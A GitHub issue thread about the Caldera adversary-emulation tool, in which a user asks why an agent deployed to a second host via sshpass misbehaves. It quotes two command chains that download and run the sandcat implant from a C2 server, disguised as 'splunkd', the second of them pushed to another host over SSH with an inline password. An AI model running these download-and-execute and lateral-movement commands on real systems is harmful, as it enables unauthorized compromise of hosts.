Deploying agent through sshpass, second host acts odd - What am I missing?

[koncentrat11]

I am trying to use the initial host as a bot and recruit a new host using SSH from the initial host, but the second host seem to acts odd.

Step 1) Compromise first host (Host1):

"server="http://xxx.xxx.xxx.xxx:8888";curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download > splunkd;chmod +x splunkd;./splunkd -server $server -group red -v"

Step 2) Utilize sshpass to compromise second host (Host2):

sshpass -p "pw" ssh username@xxx.xxx.xxx.xxx server="http://xxx.xxx.xxx.xxx:8888";curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download > splunkd;chmod +x splunkd;./splunkd -server $server -group red -v

I see the new agent (Host2) pop up in Caldera, but when I try to execute commands manually by selecting it as an agent, the responses are still from Host1 and Host2 dies shortly after. What am I missing? It seems like it ignore that I choose Host2 and keep using Host1?

Edit: It seems like it defaults to one agent, even though I select another, the first will still appear in the agent columns under operations.

[koncentrat11]

It seems like you are unable to choose an agent of your choice, if you add a manual command, it will select the same agent even though you select a different one in the dropdown?

[elegantmoose]

On our queue.

[github-actions]

This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days